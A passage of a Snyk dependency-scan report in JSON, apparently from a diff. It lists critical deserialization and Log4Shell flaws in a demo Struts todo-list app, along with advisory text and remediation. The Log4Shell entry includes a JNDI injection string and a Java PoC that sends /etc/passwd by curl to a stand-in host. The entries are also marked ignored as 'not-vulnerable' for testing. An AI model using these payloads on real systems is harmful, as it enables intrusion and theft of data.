achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. 
When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": 
"CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:57.621Z", + "expires": "2024-08-08T12:48:57.394Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": 
"https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + }, + { + "url": "https://www.exploit-db.com/exploits/46628", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.088365Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.273677Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. 
If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). 
These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99663", + "probability": "0.96725", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-4852" 
+ ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.946764Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.834525Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "commons-collections:commons-collections@3.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "commons-collections:commons-collections", + "version": "3.1", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:03.652Z", + "expires": "2024-08-08T12:49:03.427Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30401", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[1.1,1.3.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.3.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + 
"version": [ + "[1.1,1.3.3)" + ], + "functionId": { + "filePath": "org/apache/commons/fileupload/disk/DiskFileItem.java", + "className": "DiskFileItem", + "functionName": "readObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-fileupload:commons-fileupload", + "references": [ + { + "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L65", + "title": "Github ChangeLog" + }, + { + "url": "https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031", + "title": "NVD" + }, + { + "url": "http://www.tenable.com/security/research/tra-2016-12", + "title": "Tenable Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:31.745804Z" + }, + { + "assigner": "SUSE", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:04.225757Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:53:55.666846Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:58.367467Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:31.745804Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:50:04.225757Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:55.666846Z" + } + ], + "description": "## Overview\n[`commons-fileupload:commons-fileupload`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22commons-fileupload%22)\nThe Apache Commons FileUpload library contains a Java Object that, upon deserialization, can be manipulated to write or copy files in arbitrary locations. If integrated with [`ysoserial`](https://github.com/frohoff/ysoserial), it is possible to upload and execute binaries in a single deserialization call.\n\n# Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. 
However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n- Apache Blog\n\n## Remediation\nUpgrade `commons-fileupload` to version 1.3.3 or higher.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031)\n- [Tenable Security](http://www.tenable.com/security/research/tra-2016-12)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L65)\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c)\n", + "epssDetails": { + "percentile": "0.93419", + "probability": "0.05866", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-1000031" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "commons-fileupload:commons-fileupload", + "proprietary": false, + "creationTime": "2017-02-22T07:28:18.753000Z", + "functions_new": [ + { + "version": [ + "[1.1,1.3.3)" + ], + "functionId": { + "className": "org.apache.commons.fileupload.disk.DiskFileItem", + "functionName": "readObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-10-25T14:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-fileupload", + "artifactId": "commons-fileupload" + }, + "publicationTime": "2016-10-26T03:04:11.895000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:55.666846Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + 
"commons-fileupload:commons-fileupload@1.3.1" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.37", + "commons-fileupload:commons-fileupload@1.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "commons-fileupload:commons-fileupload", + "version": "1.3.1", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:17.345Z", + "expires": "2024-08-08T12:49:17.086Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "credit": [ + "Chen Zhaojun of Alibaba Cloud Security Team" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.15.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", + "className": "JndiLookup", + "functionName": "lookup" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", + "title": "Apache Jira Issues" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", + "title": "Apache Jira Issues" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/logging-log4j2/pull/608", + "title": 
"GitHub PR" + }, + { + "url": "https://github.com/Kirill89/log4shell-vulnerable-server", + "title": "PoC" + }, + { + "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", + "title": "Snyk Blog and Vulnerability Breakdown" + }, + { + "url": "https://www.exploit-db.com/exploits/51183", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:43.264835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code 
Execution (RCE).\nApache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. 
If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", + "epssDetails": { + "percentile": "0.99999", + "probability": "0.97556", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44228" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-jfh8-c2jp-5v3q" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-10T10:08:46.155884Z", + "functions_new": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.lookup.JndiLookup", + 
"functionName": "lookup" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-12-10T10:02:55Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-10T10:10:01Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.500242Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T13:04:24.344Z", + "expires": "2024-08-08T13:04:24.004Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.16.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.16.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": 
"org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", + "title": "Apache Pony Mail" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://twitter.com/marcioalm/status/1471740771581652995", + "title": "Twitter Post" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", + "title": "Nuclei Templates" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9, + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:32.295395Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package 
